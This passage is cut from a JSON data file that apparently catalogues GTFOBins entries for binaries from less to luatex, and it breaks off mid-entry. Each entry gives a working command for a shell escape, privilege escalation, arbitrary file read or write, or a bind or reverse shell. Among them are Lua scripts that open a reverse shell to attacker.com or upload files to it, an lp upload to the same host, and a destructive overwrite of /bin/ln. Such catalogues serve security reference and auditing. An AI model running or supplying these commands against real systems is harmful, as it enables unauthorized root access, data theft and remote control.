/etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:shell:0:suid","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"less /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:shell:0:unprivileged","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"less /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:shell:1:sudo","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"LESSOPEN=\"/bin/sh -s 1>&0 2>&0 # %s\" less /etc/hosts\nreset","description":"The optional `reset` command is needed to receive the echo back of the typed keystrokes.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:shell:1:unprivileged","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"LESSOPEN=\"/bin/sh -s 1>&0 2>&0 # %s\" less /etc/hosts\nreset","description":"The optional `reset` command is needed to receive the echo back of the typed keystrokes.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:shell:2:sudo","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"VISUAL='/bin/sh -s --' less /etc/hosts\nv","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:less:shell:2:unprivileged","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"VISUAL='/bin/sh -s --' less /etc/hosts\nv","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"]},{"id":"gtfo:lftp:shell:0:sudo","toolId":"gtfo:lftp","toolName":"lftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lftp -c '!/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lftp/"]},{"id":"gtfo:lftp:shell:0:suid","toolId":"gtfo:lftp","toolName":"lftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lftp -c '!/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lftp/"]},{"id":"gtfo:lftp:shell:0:unprivileged","toolId":"gtfo:lftp","toolName":"lftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"lftp -c '!/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lftp/"]},{"id":"gtfo:links:file-read:0:sudo","toolId":"gtfo:links","toolName":"links","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"links /path/to/input-file","description":"The result is displayed in a TUI interface.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/links/"]},{"id":"gtfo:links:file-read:0:suid","toolId":"gtfo:links","toolName":"links","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"links /path/to/input-file","description":"The result is displayed in a TUI interface.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/links/"]},{"id":"gtfo:links:file-read:0:unprivileged","toolId":"gtfo:links","toolName":"links","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"links /path/to/input-file","description":"The result is displayed in a TUI interface.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/links/"]},{"id":"gtfo:ln:privilege-escalation:0:sudo","toolId":"gtfo:ln","toolName":"ln","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"ln -fs /bin/sh /bin/ln\nln","description":"This overrides `ln` itself with a symlink to a shell (or any other executable) that is to be executed as root, useful in case a `sudo` rule allows to only run `ln` by path. Warning, this is a destructive action.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ln/"]},{"id":"gtfo:loginctl:shell:0:sudo","toolId":"gtfo:loginctl","toolName":"loginctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"loginctl user-status\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/loginctl/"]},{"id":"gtfo:loginctl:shell:0:unprivileged","toolId":"gtfo:loginctl","toolName":"loginctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"loginctl user-status\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/loginctl/"]},{"id":"gtfo:logrotate:file-read:0:sudo","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"logrotate /path/to/input-file","description":"The first word is returned in a error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/logrotate/"]},{"id":"gtfo:logrotate:file-read:0:suid","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"logrotate /path/to/input-file","description":"The first word is returned in a error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/logrotate/"]},{"id":"gtfo:logrotate:file-read:0:unprivileged","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"logrotate /path/to/input-file","description":"The first word is returned in a error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/logrotate/"]},{"id":"gtfo:logrotate:file-write:0:sudo","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"logrotate -l /path/to/output-file DATA","description":"The content is written in a log file.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/logrotate/"]},{"id":"gtfo:logrotate:file-write:0:suid","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"logrotate -l /path/to/output-file DATA","description":"The content is written in a log file.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/logrotate/"]},{"id":"gtfo:logrotate:file-write:0:unprivileged","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"logrotate -l /path/to/output-file DATA","description":"The content is written in a log file.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/logrotate/"]},{"id":"gtfo:logrotate:shell:0:sudo","toolId":"gtfo:logrotate","toolName":"logrotate","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e '/path/to/temp-file.config {\\nmail x@x.x\\n}' >/path/to/temp-file.config\necho '/bin/sh 0<&2 1>&2' >/path/to/temp-file.sh\nlogrotate -m /path/to/temp-file.sh -f /path/to/temp-file","description":"This command is picky about file permissions. An existing config file can be used as weel, provided that it contains a mail directive.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/logrotate/"]},{"id":"gtfo:logsave:shell:0:sudo","toolId":"gtfo:logsave","toolName":"logsave","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"logsave /dev/null /bin/sh -i","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/logsave/"]},{"id":"gtfo:logsave:shell:0:suid","toolId":"gtfo:logsave","toolName":"logsave","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"logsave /dev/null /bin/sh -i -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/logsave/"]},{"id":"gtfo:logsave:shell:0:unprivileged","toolId":"gtfo:logsave","toolName":"logsave","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"logsave /dev/null /bin/sh -i","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/logsave/"]},{"id":"gtfo:look:file-read:0:sudo","toolId":"gtfo:look","toolName":"look","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"look '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/look/"]},{"id":"gtfo:look:file-read:0:suid","toolId":"gtfo:look","toolName":"look","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"look '' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/look/"]},{"id":"gtfo:look:file-read:0:unprivileged","toolId":"gtfo:look","toolName":"look","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"look '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/look/"]},{"id":"gtfo:lp:upload:0:sudo","toolId":"gtfo:lp","toolName":"lp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"lp /path/to/input-file -h attacker.com","description":"This requires `cups` to be installed. Run the following on the attacker box beforehand:\n\n1. `lpadmin -p printer -v socket://localhost -E` to create a virtual printer;\n2. `lpadmin -d printer` to set the new printer as default;\n3. `cupsctl --remote-any` to enable printing from the Internet.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lp/"]},{"id":"gtfo:lp:upload:0:suid","toolId":"gtfo:lp","toolName":"lp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"lp /path/to/input-file -h attacker.com","description":"This requires `cups` to be installed. Run the following on the attacker box beforehand:\n\n1. `lpadmin -p printer -v socket://localhost -E` to create a virtual printer;\n2. `lpadmin -d printer` to set the new printer as default;\n3. `cupsctl --remote-any` to enable printing from the Internet.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lp/"]},{"id":"gtfo:lp:upload:0:unprivileged","toolId":"gtfo:lp","toolName":"lp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"lp /path/to/input-file -h attacker.com","description":"This requires `cups` to be installed. Run the following on the attacker box beforehand:\n\n1. `lpadmin -p printer -v socket://localhost -E` to create a virtual printer;\n2. `lpadmin -d printer` to set the new printer as default;\n3. `cupsctl --remote-any` to enable printing from the Internet.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lp/"]},{"id":"gtfo:ltrace:file-read:0:sudo","toolId":"gtfo:ltrace","toolName":"ltrace","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ltrace -F /path/to/input-file /dev/null","description":"The file is parsed as a configuration file and its content is shown as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ltrace/"]},{"id":"gtfo:ltrace:file-read:0:suid","toolId":"gtfo:ltrace","toolName":"ltrace","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ltrace -F /path/to/input-file /dev/null","description":"The file is parsed as a configuration file and its content is shown as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ltrace/"]},{"id":"gtfo:ltrace:file-read:0:unprivileged","toolId":"gtfo:ltrace","toolName":"ltrace","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ltrace -F /path/to/input-file /dev/null","description":"The file is parsed as a configuration file and its content is shown as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ltrace/"]},{"id":"gtfo:ltrace:file-write:0:sudo","toolId":"gtfo:ltrace","toolName":"ltrace","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ltrace -s 999 -o /path/to/input-file ltrace -F DATA","description":"The data to be written appears amid the library function call log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough instead of `999`. More generally, any binary that executes whatever library function call passing arbitrary data can be used in place of `ltrace -F DATA`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ltrace/"]},{"id":"gtfo:ltrace:file-write:0:unprivileged","toolId":"gtfo:ltrace","toolName":"ltrace","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ltrace -s 999 -o /path/to/input-file ltrace -F DATA","description":"The data to be written appears amid the library function call log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough instead of `999`. More generally, any binary that executes whatever library function call passing arbitrary data can be used in place of `ltrace -F DATA`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ltrace/"]},{"id":"gtfo:ltrace:shell:0:sudo","toolId":"gtfo:ltrace","toolName":"ltrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ltrace -b -L /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ltrace/"]},{"id":"gtfo:ltrace:shell:0:unprivileged","toolId":"gtfo:ltrace","toolName":"ltrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ltrace -b -L /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ltrace/"]},{"id":"gtfo:lua:bind-shell:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n while true do\n local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));c:send(b);\n end;c:close();f:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:bind-shell:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n while true do\n local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));c:send(b);\n end;c:close();f:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:bind-shell:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n while true do\n local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));c:send(b);\n end;c:close();f:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:download:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n local d,x=c:receive(\"*a\");\n c:close();\n local f=io.open(\"/path/to/output-file\", \"wb\");\n f:write(d);\n io.close(f);'","description":"This requires `lua-socket` to be available.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:download:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n local d,x=c:receive(\"*a\");\n c:close();\n local f=io.open(\"/path/to/output-file\", \"wb\");\n f:write(d);\n io.close(f);'","description":"This requires `lua-socket` to be available.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:download:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n local d,x=c:receive(\"*a\");\n c:close();\n local f=io.open(\"/path/to/output-file\", \"wb\");\n f:write(d);\n io.close(f);'","description":"This requires `lua-socket` to be available.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:file-read:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"lua -e 'local f=io.open(\"/path/to/input-file\", \"rb\"); io.write(f:read(\"*a\")); io.close(f);'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:file-read:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"lua -e 'local f=io.open(\"/path/to/input-file\", \"rb\"); io.write(f:read(\"*a\")); io.close(f);'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:file-read:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"lua -e 'local f=io.open(\"/path/to/input-file\", \"rb\"); io.write(f:read(\"*a\")); io.close(f);'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:file-write:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"lua -e 'local f=io.open(\"/path/to/output-file\", \"wb\"); f:write(\"DATA\"); io.close(f);'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:file-write:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"lua -e 'local f=io.open(\"/path/to/output-file\", \"wb\"); f:write(\"DATA\"); io.close(f);'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:file-write:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"lua -e 'local f=io.open(\"/path/to/output-file\", \"wb\"); f:write(\"DATA\"); io.close(f);'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:reverse-shell:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"lua -e '\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n while true do\n local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));t:send(b);\n end;\n f:close();t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:reverse-shell:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"lua -e '\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n while true do\n local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));t:send(b);\n end;\n f:close();t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:reverse-shell:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"lua -e '\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n while true do\n local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));t:send(b);\n end;\n f:close();t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:shell:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lua -e 'os.execute(\"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:shell:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lua -e 'os.execute(\"/bin/sh\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:shell:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"lua -e 'os.execute(\"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:upload:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"lua -e '\n local f=io.open(\"/path/to/input-file\", \"rb\")\n local d=f:read(\"*a\")\n io.close(f);\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n t:send(d);\n t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:upload:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"lua -e '\n local f=io.open(\"/path/to/input-file\", \"rb\")\n local d=f:read(\"*a\")\n io.close(f);\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n t:send(d);\n t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:upload:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"lua -e '\n local f=io.open(\"/path/to/input-file\", \"rb\")\n local d=f:read(\"*a\")\n io.close(f);\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n t:send(d);\n t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lualatex:inherit:0:sudo","toolId":"gtfo:lualatex","toolName":"lualatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"lualatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lualatex/"]},{"id":"gtfo:lualatex:inherit:0:suid","toolId":"gtfo:lualatex","toolName":"lualatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"lualatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lualatex/"]},{"id":"gtfo:lualatex:inherit:0:unprivileged","toolId":"gtfo:lualatex","toolName":"lualatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"lualatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lualatex/"]},{"id":"gtfo:luatex:inherit:0:sudo","toolId":"gtfo:luatex","toolName":"luatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"luatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/luatex/"]},{"id":"gtfo:luatex:inherit:0:suid","toolId":"gtfo:luatex","toolName":"luatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"luatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/luatex/"]},{"id":"gtfo:luatex:inherit:0:unprivileged","toolId":"gtfo:luatex","toolName":"luatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File 